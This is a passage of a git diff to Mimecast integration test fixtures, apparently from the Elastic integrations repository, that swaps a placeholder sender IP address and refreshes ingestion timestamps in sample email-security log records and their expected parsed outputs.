\"created\": \"2021-10-29T15:07:00.259Z\", \"modified\": \"2021-10-29T15:07:00.259Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'e87c5de5f07b36806521334cd25e756b66aa8376d2d52faf269b1878c62cf3dd']\", \"valid_from\": \"2021-10-29T15:07:00.259Z\" }", "category": "threat", "type": "indicator", diff --git a/packages/mimecast/data_stream/ttp_ap_logs/_dev/test/pipeline/test-ttp-ap-logs.log-expected.json b/packages/mimecast/data_stream/ttp_ap_logs/_dev/test/pipeline/test-ttp-ap-logs.log-expected.json index fb94b0a115a..23150b6a377 100644 --- a/packages/mimecast/data_stream/ttp_ap_logs/_dev/test/pipeline/test-ttp-ap-logs.log-expected.json +++ b/packages/mimecast/data_stream/ttp_ap_logs/_dev/test/pipeline/test-ttp-ap-logs.log-expected.json @@ -15,7 +15,7 @@ }, "event": { "action": "user_release_none", - "ingested": "2021-11-25T11:34:14.425308900Z", + "ingested": "2021-12-09T15:16:07.254286800Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"fileName\":\"numbers.pdf\",\"fileType\":\"application\\/pdf\",\"result\":\"safe\",\"actionTriggered\":\"user release, none\",\"date\":\"2021-10-14T18:54:32+0000\",\"details\":\"Safe \\r\\nTime taken: 0 hrs, 0 min, 4 sec\",\"route\":\"inbound\",\"messageId\":\"\u003c20200806044148.F35F813B435@mail.brianjthronton.com\u003e\",\"subject\":\"Important Updated Numbers from the Center for Disease Control\",\"fileHash\":\"eaeef09b60a59b913e9bfc0a4373e25d6182beff388957473fba517cc09345e3\",\"definition\":\"Inbound - Safe file with On-Demand Sandbox\"}", "created": "2021-10-14T18:54:32+0000" }, @@ -61,7 +61,7 @@ }, "event": { "action": "user_release_none", - "ingested": "2021-11-25T11:34:14.425311400Z", + "ingested": "2021-12-09T15:16:07.254295600Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"fileName\":\"Titus-Test Doc - Classification - InternalUseOnly.docx\",\"fileType\":\"application\\/vnd.openxmlformats-officedocument.wordprocessingml.document\",\"result\":\"safe\",\"actionTriggered\":\"user release, none\",\"date\":\"2021-10-14T11:24:23+0000\",\"details\":\"Safe \\r\\nTime taken: 0 hrs, 0 min, 5 sec\",\"route\":\"inbound\",\"messageId\":\"\u003cDB8P194MB0824EE4C8D360CCE3DEB0243A1B89@DB8P194MB0824.EURP194.PROD.OUTLOOK.COM\u003e\",\"subject\":\"FW: Titus classification work\",\"fileHash\":\"2fb26be55ac710e4d9f80677ba24ae212dbb36bd934a0569fe521839e9f5d16e\",\"definition\":\"Inbound - Safe file with On-Demand Sandbox\"}", "created": "2021-10-14T11:24:23+0000" }, @@ -107,7 +107,7 @@ }, "event": { "action": "user_release_none", - "ingested": "2021-11-25T11:34:14.425312500Z", + "ingested": "2021-12-09T15:16:07.254301700Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"fileName\":\"Titus classification v0.3.pptx\",\"fileType\":\"application\\/vnd.openxmlformats-officedocument.presentationml\",\"result\":\"safe\",\"actionTriggered\":\"user release, none\",\"date\":\"2021-10-14T11:24:23+0000\",\"details\":\"Safe \\r\\nTime taken: 0 hrs, 0 min, 5 sec\",\"route\":\"inbound\",\"messageId\":\"\u003cDB8P194MB0824EE4C8D360CCE3DEB0243A1B89@DB8P194MB0824.EURP194.PROD.OUTLOOK.COM\u003e\",\"subject\":\"FW: Titus classification work\",\"fileHash\":\"111b86e1244ce6389efb60cddc001d594d334c540e85f9976be467a4ce472973\",\"definition\":\"Inbound - Safe file with On-Demand Sandbox\"}", "created": "2021-10-14T11:24:23+0000" }, diff --git a/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log b/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log index 293dfe60f67..c38568b874f 100644 --- a/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log +++ b/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log @@ -1,3 +1,3 @@ -{"id":"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjU1NjIw1FEqSy0qzszPU7ICskvywAoNDAyVagFirRIG","senderAddress":"smtp@example.com","recipientAddress":"johndoe@example.com","subject":"Requested File","definition":"IP - 1 hit (Tag email)","hits":1,"identifiers":["internal_user_name"],"action":"none","taggedExternal":false,"taggedMalicious":true,"senderIpAddress":"8.8.8.8","eventTime":"2021-10-15T17:10:46+0000","impersonationResults":[{"impersonationDomainSource":"internal_user_name","similarDomain":"John Doe Jr ","stringSimilarToDomain":"John Doe Jr","checkerResult":"hit"}],"messageId":""} -{"id":"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzszAx0VEqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGShEhs","senderAddress":"johndoe@gmail.com","recipientAddress":"johndoe@example.com","subject":"Fwd: Here ya go","definition":"IP - 1 hit (Tag email)","hits":1,"identifiers":["internal_user_name"],"action":"none","taggedExternal":false,"taggedMalicious":true,"senderIpAddress":"8.8.8.8","eventTime":"2021-10-15T06:16:34+0000","impersonationResults":[{"impersonationDomainSource":"internal_user_name","similarDomain":"John Doe ","stringSimilarToDomain":"John Doe","checkerResult":"hit"}],"messageId":""} -{"id":"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzMDMz01EqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGQhEhc","senderAddress":"johndoe@mimecast.com","recipientAddress":"johndoe@example.com","subject":"RE: MSP Sales of Managed E2E","definition":"IP - 2 hits (Hold for Review \/ User Hold)","hits":2,"identifiers":["targeted_threat_dictionary","internal_user_name"],"action":"hold","taggedExternal":false,"taggedMalicious":true,"senderIpAddress":"8.8.8.8","eventTime":"2021-10-13T16:12:07+0000","impersonationResults":[{"impersonationDomainSource":"internal_user_name","similarDomain":"Emily Doe ","stringSimilarToDomain":"Emily Doe","checkerResult":"hit"},{"impersonationDomainSource":"targeted_threat_dictionary","stringSimilarToDomain":"who"}],"messageId":""} \ No newline at end of file +{"id":"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjU1NjIw1FEqSy0qzszPU7ICskvywAoNDAyVagFirRIG","senderAddress":"smtp@example.com","recipientAddress":"johndoe@example.com","subject":"Requested File","definition":"IP - 1 hit (Tag email)","hits":1,"identifiers":["internal_user_name"],"action":"none","taggedExternal":false,"taggedMalicious":true,"senderIpAddress":"67.43.156.15","eventTime":"2021-10-15T17:10:46+0000","impersonationResults":[{"impersonationDomainSource":"internal_user_name","similarDomain":"John Doe Jr ","stringSimilarToDomain":"John Doe Jr","checkerResult":"hit"}],"messageId":""} +{"id":"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzszAx0VEqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGShEhs","senderAddress":"johndoe@gmail.com","recipientAddress":"johndoe@example.com","subject":"Fwd: Here ya go","definition":"IP - 1 hit (Tag email)","hits":1,"identifiers":["internal_user_name"],"action":"none","taggedExternal":false,"taggedMalicious":true,"senderIpAddress":"67.43.156.15","eventTime":"2021-10-15T06:16:34+0000","impersonationResults":[{"impersonationDomainSource":"internal_user_name","similarDomain":"John Doe ","stringSimilarToDomain":"John Doe","checkerResult":"hit"}],"messageId":""} +{"id":"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzMDMz01EqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGQhEhc","senderAddress":"johndoe@mimecast.com","recipientAddress":"johndoe@example.com","subject":"RE: MSP Sales of Managed E2E","definition":"IP - 2 hits (Hold for Review \/ User Hold)","hits":2,"identifiers":["targeted_threat_dictionary","internal_user_name"],"action":"hold","taggedExternal":false,"taggedMalicious":true,"senderIpAddress":"67.43.156.15","eventTime":"2021-10-13T16:12:07+0000","impersonationResults":[{"impersonationDomainSource":"internal_user_name","similarDomain":"Emily Doe ","stringSimilarToDomain":"Emily Doe","checkerResult":"hit"},{"impersonationDomainSource":"targeted_threat_dictionary","stringSimilarToDomain":"who"}],"messageId":""} \ No newline at end of file diff --git a/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log-expected.json b/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log-expected.json index 9358a91a0f2..d6fab92838c 100644 --- a/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log-expected.json +++ b/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log-expected.json @@ -7,19 +7,19 @@ }, "related": { "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "rule": { "name": "IP - 1 hit (Tag email)" }, "source": { - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "none", - "ingested": "2021-11-25T11:34:15.002442200Z", - "original": "{\"id\":\"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjU1NjIw1FEqSy0qzszPU7ICskvywAoNDAyVagFirRIG\",\"senderAddress\":\"smtp@example.com\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Requested File\",\"definition\":\"IP - 1 hit (Tag email)\",\"hits\":1,\"identifiers\":[\"internal_user_name\"],\"action\":\"none\",\"taggedExternal\":false,\"taggedMalicious\":true,\"senderIpAddress\":\"8.8.8.8\",\"eventTime\":\"2021-10-15T17:10:46+0000\",\"impersonationResults\":[{\"impersonationDomainSource\":\"internal_user_name\",\"similarDomain\":\"John Doe Jr \u003cjohndoejr@example.com\u003e\",\"stringSimilarToDomain\":\"John Doe Jr\",\"checkerResult\":\"hit\"}],\"messageId\":\"\u003cEE7E97EA-1926-4A90-9399-D049A98893F4@emailsec.ninja\u003e\"}", + "ingested": "2021-12-09T15:16:07.465640200Z", + "original": "{\"id\":\"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjU1NjIw1FEqSy0qzszPU7ICskvywAoNDAyVagFirRIG\",\"senderAddress\":\"smtp@example.com\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Requested File\",\"definition\":\"IP - 1 hit (Tag email)\",\"hits\":1,\"identifiers\":[\"internal_user_name\"],\"action\":\"none\",\"taggedExternal\":false,\"taggedMalicious\":true,\"senderIpAddress\":\"67.43.156.15\",\"eventTime\":\"2021-10-15T17:10:46+0000\",\"impersonationResults\":[{\"impersonationDomainSource\":\"internal_user_name\",\"similarDomain\":\"John Doe Jr \u003cjohndoejr@example.com\u003e\",\"stringSimilarToDomain\":\"John Doe Jr\",\"checkerResult\":\"hit\"}],\"messageId\":\"\u003cEE7E97EA-1926-4A90-9399-D049A98893F4@emailsec.ninja\u003e\"}", "id": "MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjU1NjIw1FEqSy0qzszPU7ICskvywAoNDAyVagFirRIG", "created": "2021-10-15T17:10:46+0000" }, @@ -60,19 +60,19 @@ }, "related": { "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "rule": { "name": "IP - 1 hit (Tag email)" }, "source": { - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "none", - "ingested": "2021-11-25T11:34:15.002445300Z", - "original": "{\"id\":\"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzszAx0VEqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGShEhs\",\"senderAddress\":\"johndoe@gmail.com\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Fwd: Here ya go\",\"definition\":\"IP - 1 hit (Tag email)\",\"hits\":1,\"identifiers\":[\"internal_user_name\"],\"action\":\"none\",\"taggedExternal\":false,\"taggedMalicious\":true,\"senderIpAddress\":\"8.8.8.8\",\"eventTime\":\"2021-10-15T06:16:34+0000\",\"impersonationResults\":[{\"impersonationDomainSource\":\"internal_user_name\",\"similarDomain\":\"John Doe \u003cjohndoe@example.com\u003e\",\"stringSimilarToDomain\":\"John Doe\",\"checkerResult\":\"hit\"}],\"messageId\":\"\u003cCAOsCE-eP_fM6j=OL7Mwufic_s8t8VgNaCWdWM+sHYvWAFxiDig@mail.gmail.com\u003e\"}", + "ingested": "2021-12-09T15:16:07.465645200Z", + "original": "{\"id\":\"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzszAx0VEqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGShEhs\",\"senderAddress\":\"johndoe@gmail.com\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Fwd: Here ya go\",\"definition\":\"IP - 1 hit (Tag email)\",\"hits\":1,\"identifiers\":[\"internal_user_name\"],\"action\":\"none\",\"taggedExternal\":false,\"taggedMalicious\":true,\"senderIpAddress\":\"67.43.156.15\",\"eventTime\":\"2021-10-15T06:16:34+0000\",\"impersonationResults\":[{\"impersonationDomainSource\":\"internal_user_name\",\"similarDomain\":\"John Doe \u003cjohndoe@example.com\u003e\",\"stringSimilarToDomain\":\"John Doe\",\"checkerResult\":\"hit\"}],\"messageId\":\"\u003cCAOsCE-eP_fM6j=OL7Mwufic_s8t8VgNaCWdWM+sHYvWAFxiDig@mail.gmail.com\u003e\"}", "id": "MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzszAx0VEqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGShEhs", "created": "2021-10-15T06:16:34+0000" }, @@ -113,19 +113,19 @@ }, "related": { "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "rule": { "name": "IP - 2 hits (Hold for Review / User Hold)" }, "source": { - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "hold", - "ingested": "2021-11-25T11:34:15.002446500Z", - "original": "{\"id\":\"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzMDMz01EqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGQhEhc\",\"senderAddress\":\"johndoe@mimecast.com\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"RE: MSP Sales of Managed E2E\",\"definition\":\"IP - 2 hits (Hold for Review \\/ User Hold)\",\"hits\":2,\"identifiers\":[\"targeted_threat_dictionary\",\"internal_user_name\"],\"action\":\"hold\",\"taggedExternal\":false,\"taggedMalicious\":true,\"senderIpAddress\":\"8.8.8.8\",\"eventTime\":\"2021-10-13T16:12:07+0000\",\"impersonationResults\":[{\"impersonationDomainSource\":\"internal_user_name\",\"similarDomain\":\"Emily Doe \u003cemilydoe@example.com\u003e\",\"stringSimilarToDomain\":\"Emily Doe\",\"checkerResult\":\"hit\"},{\"impersonationDomainSource\":\"targeted_threat_dictionary\",\"stringSimilarToDomain\":\"who\"}],\"messageId\":\"\u003cPR3P194MB06183A3BE81F0831A8402B47D3B79@PR3P194MB0618.EURP194.PROD.OUTLOOK.COM\u003e\"}", + "ingested": "2021-12-09T15:16:07.465651500Z", + "original": "{\"id\":\"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzMDMz01EqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGQhEhc\",\"senderAddress\":\"johndoe@mimecast.com\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"RE: MSP Sales of Managed E2E\",\"definition\":\"IP - 2 hits (Hold for Review \\/ User Hold)\",\"hits\":2,\"identifiers\":[\"targeted_threat_dictionary\",\"internal_user_name\"],\"action\":\"hold\",\"taggedExternal\":false,\"taggedMalicious\":true,\"senderIpAddress\":\"67.43.156.15\",\"eventTime\":\"2021-10-13T16:12:07+0000\",\"impersonationResults\":[{\"impersonationDomainSource\":\"internal_user_name\",\"similarDomain\":\"Emily Doe \u003cemilydoe@example.com\u003e\",\"stringSimilarToDomain\":\"Emily Doe\",\"checkerResult\":\"hit\"},{\"impersonationDomainSource\":\"targeted_threat_dictionary\",\"stringSimilarToDomain\":\"who\"}],\"messageId\":\"\u003cPR3P194MB06183A3BE81F0831A8402B47D3B79@PR3P194MB0618.EURP194.PROD.OUTLOOK.COM\u003e\"}", "id": "MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzMDMz01EqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGQhEhc", "created": "2021-10-13T16:12:07+0000" }, diff --git a/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log b/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log index 796ea428c70..b35bd7a7a6a 100644 --- a/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log +++ b/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log @@ -1,3 +1,3 @@ -{"userEmailAddress": "johndoe@example.com", "fromUserEmailAddress": "bestbuyinfo@emailinfo.bestbuy.com", "url": "https://click.emailinfo2.bestbuy.com/?qs=5c47c91aeb44fac857370c26ddf09c3f484431e1ccfa636fc64e26e40dd87efdb43d4deeeab8c2e727ebfa079e8cf1404c095c511152e4b09e7d00bf8377f32d", "ttpDefinition": "Inbound URL 'Aggressive'", "subject": "Today only: Save $100 on Tineco Pure One S12 smart cordless stick vacuum, plus more.", "action": "allow", "adminOverride": "N/A", "userOverride": "None", "scanResult": "clean", "category": "Business", "sendingIp": "8.8.8.8", "userAwarenessAction": "Continue", "date": "2021-10-16T14:45:34+0000", "actions": "Allow", "route": "inbound", "creationMethod": "User Click", "emailPartsDescription": [ "Body" ], "messageId": "<31b43097-94f9-4f64-8e37-8ad23650c692@ind1s01mta1292.xt.local>" } -{"userEmailAddress":"johndoe@example.com","fromUserEmailAddress":"noreply@r.livingsocial.com","url":"https:\/\/www.livingsocial.com\/browse\/?locale=en_US&topCategory=all-deals&p=14&utm_source=newsletter_im&utm_medium=email&t_division=boston&date=20211016&uu=1bea09ca-8a29-11e9-b7f7-0242ac120002&CID=US&tx=0&s=body&c=banner&d=dynamic-banner-4&utm_campaign=194d1bb8-dc74-4bed-b470-0154e934bfb3_0_20211016_treatment0","ttpDefinition":"Inbound URL 'Aggressive'","subject":"Jump Pass + Mega Sale","action":"allow","adminOverride":"N\/A","userOverride":"None","scanResult":"clean","category":"Business","sendingIp":"8.8.8.8","userAwarenessAction":"Continue","date":"2021-10-16T14:07:38+0000","actions":"Allow","route":"inbound","creationMethod":"User Click","emailPartsDescription":["Body"],"messageId":"<803962655.28921622.1634393221485.JavaMail.rocketman@push-dispatcher65.sac1>"} -{"userEmailAddress":"johndoe@example.com","fromUserEmailAddress":"nflshop.com@eml.nflshop.com","url":"https:\/\/www.nflshop.com\/how-can-i-contact-customer-service\/ch-2244","ttpDefinition":"Inbound URL 'Aggressive'","subject":"25% Off Tees to Give During Early Gifting Sale","action":"allow","adminOverride":"N\/A","userOverride":"None","scanResult":"clean","category":"Fashion & Beauty","sendingIp":"8.8.8.8","userAwarenessAction":"Continue","date":"2021-10-16T13:31:56+0000","actions":"Allow","route":"inbound","creationMethod":"User Click","emailPartsDescription":["Body"],"messageId":"<28ad4be3-2d3a-491d-9aa7-a5a907123da1@ind1s01mta1115.xt.local>"} \ No newline at end of file +{"userEmailAddress": "johndoe@example.com", "fromUserEmailAddress": "bestbuyinfo@emailinfo.bestbuy.com", "url": "https://click.emailinfo2.bestbuy.com/?qs=5c47c91aeb44fac857370c26ddf09c3f484431e1ccfa636fc64e26e40dd87efdb43d4deeeab8c2e727ebfa079e8cf1404c095c511152e4b09e7d00bf8377f32d", "ttpDefinition": "Inbound URL 'Aggressive'", "subject": "Today only: Save $100 on Tineco Pure One S12 smart cordless stick vacuum, plus more.", "action": "allow", "adminOverride": "N/A", "userOverride": "None", "scanResult": "clean", "category": "Business", "sendingIp": "67.43.156.15", "userAwarenessAction": "Continue", "date": "2021-10-16T14:45:34+0000", "actions": "Allow", "route": "inbound", "creationMethod": "User Click", "emailPartsDescription": [ "Body" ], "messageId": "<31b43097-94f9-4f64-8e37-8ad23650c692@ind1s01mta1292.xt.local>" } +{"userEmailAddress":"johndoe@example.com","fromUserEmailAddress":"noreply@r.livingsocial.com","url":"https:\/\/www.livingsocial.com\/browse\/?locale=en_US&topCategory=all-deals&p=14&utm_source=newsletter_im&utm_medium=email&t_division=boston&date=20211016&uu=1bea09ca-8a29-11e9-b7f7-0242ac120002&CID=US&tx=0&s=body&c=banner&d=dynamic-banner-4&utm_campaign=194d1bb8-dc74-4bed-b470-0154e934bfb3_0_20211016_treatment0","ttpDefinition":"Inbound URL 'Aggressive'","subject":"Jump Pass + Mega Sale","action":"allow","adminOverride":"N\/A","userOverride":"None","scanResult":"clean","category":"Business","sendingIp":"67.43.156.15","userAwarenessAction":"Continue","date":"2021-10-16T14:07:38+0000","actions":"Allow","route":"inbound","creationMethod":"User Click","emailPartsDescription":["Body"],"messageId":"<803962655.28921622.1634393221485.JavaMail.rocketman@push-dispatcher65.sac1>"} +{"userEmailAddress":"johndoe@example.com","fromUserEmailAddress":"nflshop.com@eml.nflshop.com","url":"https:\/\/www.nflshop.com\/how-can-i-contact-customer-service\/ch-2244","ttpDefinition":"Inbound URL 'Aggressive'","subject":"25% Off Tees to Give During Early Gifting Sale","action":"allow","adminOverride":"N\/A","userOverride":"None","scanResult":"clean","category":"Fashion & Beauty","sendingIp":"67.43.156.15","userAwarenessAction":"Continue","date":"2021-10-16T13:31:56+0000","actions":"Allow","route":"inbound","creationMethod":"User Click","emailPartsDescription":["Body"],"messageId":"<28ad4be3-2d3a-491d-9aa7-a5a907123da1@ind1s01mta1115.xt.local>"} \ No newline at end of file diff --git a/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log-expected.json b/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log-expected.json index baa890b2ad9..ed7f5ccbef8 100644 --- a/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log-expected.json +++ b/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log-expected.json @@ -5,7 +5,7 @@ "name": "Inbound URL 'Aggressive'" }, "source": { - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "url": { "original": "https://click.emailinfo2.bestbuy.com/?qs=5c47c91aeb44fac857370c26ddf09c3f484431e1ccfa636fc64e26e40dd87efdb43d4deeeab8c2e727ebfa079e8cf1404c095c511152e4b09e7d00bf8377f32d" @@ -23,13 +23,13 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "event": { "action": "Continue", - "ingested": "2021-11-25T11:34:15.770244300Z", - "original": "{\"userEmailAddress\": \"johndoe@example.com\", \"fromUserEmailAddress\": \"bestbuyinfo@emailinfo.bestbuy.com\", \"url\": \"https://click.emailinfo2.bestbuy.com/?qs=5c47c91aeb44fac857370c26ddf09c3f484431e1ccfa636fc64e26e40dd87efdb43d4deeeab8c2e727ebfa079e8cf1404c095c511152e4b09e7d00bf8377f32d\", \"ttpDefinition\": \"Inbound URL 'Aggressive'\", \"subject\": \"Today only: Save $100 on Tineco Pure One S12 smart cordless stick vacuum, plus more.\", \"action\": \"allow\", \"adminOverride\": \"N/A\", \"userOverride\": \"None\", \"scanResult\": \"clean\", \"category\": \"Business\", \"sendingIp\": \"8.8.8.8\", \"userAwarenessAction\": \"Continue\", \"date\": \"2021-10-16T14:45:34+0000\", \"actions\": \"Allow\", \"route\": \"inbound\", \"creationMethod\": \"User Click\", \"emailPartsDescription\": [ \"Body\" ], \"messageId\": \"\u003c31b43097-94f9-4f64-8e37-8ad23650c692@ind1s01mta1292.xt.local\u003e\" }", + "ingested": "2021-12-09T15:16:07.699281Z", + "original": "{\"userEmailAddress\": \"johndoe@example.com\", \"fromUserEmailAddress\": \"bestbuyinfo@emailinfo.bestbuy.com\", \"url\": \"https://click.emailinfo2.bestbuy.com/?qs=5c47c91aeb44fac857370c26ddf09c3f484431e1ccfa636fc64e26e40dd87efdb43d4deeeab8c2e727ebfa079e8cf1404c095c511152e4b09e7d00bf8377f32d\", \"ttpDefinition\": \"Inbound URL 'Aggressive'\", \"subject\": \"Today only: Save $100 on Tineco Pure One S12 smart cordless stick vacuum, plus more.\", \"action\": \"allow\", \"adminOverride\": \"N/A\", \"userOverride\": \"None\", \"scanResult\": \"clean\", \"category\": \"Business\", \"sendingIp\": \"67.43.156.15\", \"userAwarenessAction\": \"Continue\", \"date\": \"2021-10-16T14:45:34+0000\", \"actions\": \"Allow\", \"route\": \"inbound\", \"creationMethod\": \"User Click\", \"emailPartsDescription\": [ \"Body\" ], \"messageId\": \"\u003c31b43097-94f9-4f64-8e37-8ad23650c692@ind1s01mta1292.xt.local\u003e\" }", "created": "2021-10-16T14:45:34+0000" }, "user": { @@ -63,7 +63,7 @@ "name": "Inbound URL 'Aggressive'" }, "source": { - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "url": { "original": "https://www.livingsocial.com/browse/?locale=en_US\u0026topCategory=all-deals\u0026p=14\u0026utm_source=newsletter_im\u0026utm_medium=email\u0026t_division=boston\u0026date=20211016\u0026uu=1bea09ca-8a29-11e9-b7f7-0242ac120002\u0026CID=US\u0026tx=0\u0026s=body\u0026c=banner\u0026d=dynamic-banner-4\u0026utm_campaign=194d1bb8-dc74-4bed-b470-0154e934bfb3_0_20211016_treatment0" @@ -81,13 +81,13 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "event": { "action": "Continue", - "ingested": "2021-11-25T11:34:15.770246800Z", - "original": "{\"userEmailAddress\":\"johndoe@example.com\",\"fromUserEmailAddress\":\"noreply@r.livingsocial.com\",\"url\":\"https:\\/\\/www.livingsocial.com\\/browse\\/?locale=en_US\u0026topCategory=all-deals\u0026p=14\u0026utm_source=newsletter_im\u0026utm_medium=email\u0026t_division=boston\u0026date=20211016\u0026uu=1bea09ca-8a29-11e9-b7f7-0242ac120002\u0026CID=US\u0026tx=0\u0026s=body\u0026c=banner\u0026d=dynamic-banner-4\u0026utm_campaign=194d1bb8-dc74-4bed-b470-0154e934bfb3_0_20211016_treatment0\",\"ttpDefinition\":\"Inbound URL 'Aggressive'\",\"subject\":\"Jump Pass + Mega Sale\",\"action\":\"allow\",\"adminOverride\":\"N\\/A\",\"userOverride\":\"None\",\"scanResult\":\"clean\",\"category\":\"Business\",\"sendingIp\":\"8.8.8.8\",\"userAwarenessAction\":\"Continue\",\"date\":\"2021-10-16T14:07:38+0000\",\"actions\":\"Allow\",\"route\":\"inbound\",\"creationMethod\":\"User Click\",\"emailPartsDescription\":[\"Body\"],\"messageId\":\"\u003c803962655.28921622.1634393221485.JavaMail.rocketman@push-dispatcher65.sac1\u003e\"}", + "ingested": "2021-12-09T15:16:07.699289800Z", + "original": "{\"userEmailAddress\":\"johndoe@example.com\",\"fromUserEmailAddress\":\"noreply@r.livingsocial.com\",\"url\":\"https:\\/\\/www.livingsocial.com\\/browse\\/?locale=en_US\u0026topCategory=all-deals\u0026p=14\u0026utm_source=newsletter_im\u0026utm_medium=email\u0026t_division=boston\u0026date=20211016\u0026uu=1bea09ca-8a29-11e9-b7f7-0242ac120002\u0026CID=US\u0026tx=0\u0026s=body\u0026c=banner\u0026d=dynamic-banner-4\u0026utm_campaign=194d1bb8-dc74-4bed-b470-0154e934bfb3_0_20211016_treatment0\",\"ttpDefinition\":\"Inbound URL 'Aggressive'\",\"subject\":\"Jump Pass + Mega Sale\",\"action\":\"allow\",\"adminOverride\":\"N\\/A\",\"userOverride\":\"None\",\"scanResult\":\"clean\",\"category\":\"Business\",\"sendingIp\":\"67.43.156.15\",\"userAwarenessAction\":\"Continue\",\"date\":\"2021-10-16T14:07:38+0000\",\"actions\":\"Allow\",\"route\":\"inbound\",\"creationMethod\":\"User Click\",\"emailPartsDescription\":[\"Body\"],\"messageId\":\"\u003c803962655.28921622.1634393221485.JavaMail.rocketman@push-dispatcher65.sac1\u003e\"}", "created": "2021-10-16T14:07:38+0000" }, "user": { @@ -121,7 +121,7 @@ "name": "Inbound URL 'Aggressive'" }, "source": { - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "url": { "original": "https://www.nflshop.com/how-can-i-contact-customer-service/ch-2244" @@ -139,13 +139,13 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "event": { "action": "Continue", - "ingested": "2021-11-25T11:34:15.770247900Z", - "original": "{\"userEmailAddress\":\"johndoe@example.com\",\"fromUserEmailAddress\":\"nflshop.com@eml.nflshop.com\",\"url\":\"https:\\/\\/www.nflshop.com\\/how-can-i-contact-customer-service\\/ch-2244\",\"ttpDefinition\":\"Inbound URL 'Aggressive'\",\"subject\":\"25% Off Tees to Give During Early Gifting Sale\",\"action\":\"allow\",\"adminOverride\":\"N\\/A\",\"userOverride\":\"None\",\"scanResult\":\"clean\",\"category\":\"Fashion \u0026 Beauty\",\"sendingIp\":\"8.8.8.8\",\"userAwarenessAction\":\"Continue\",\"date\":\"2021-10-16T13:31:56+0000\",\"actions\":\"Allow\",\"route\":\"inbound\",\"creationMethod\":\"User 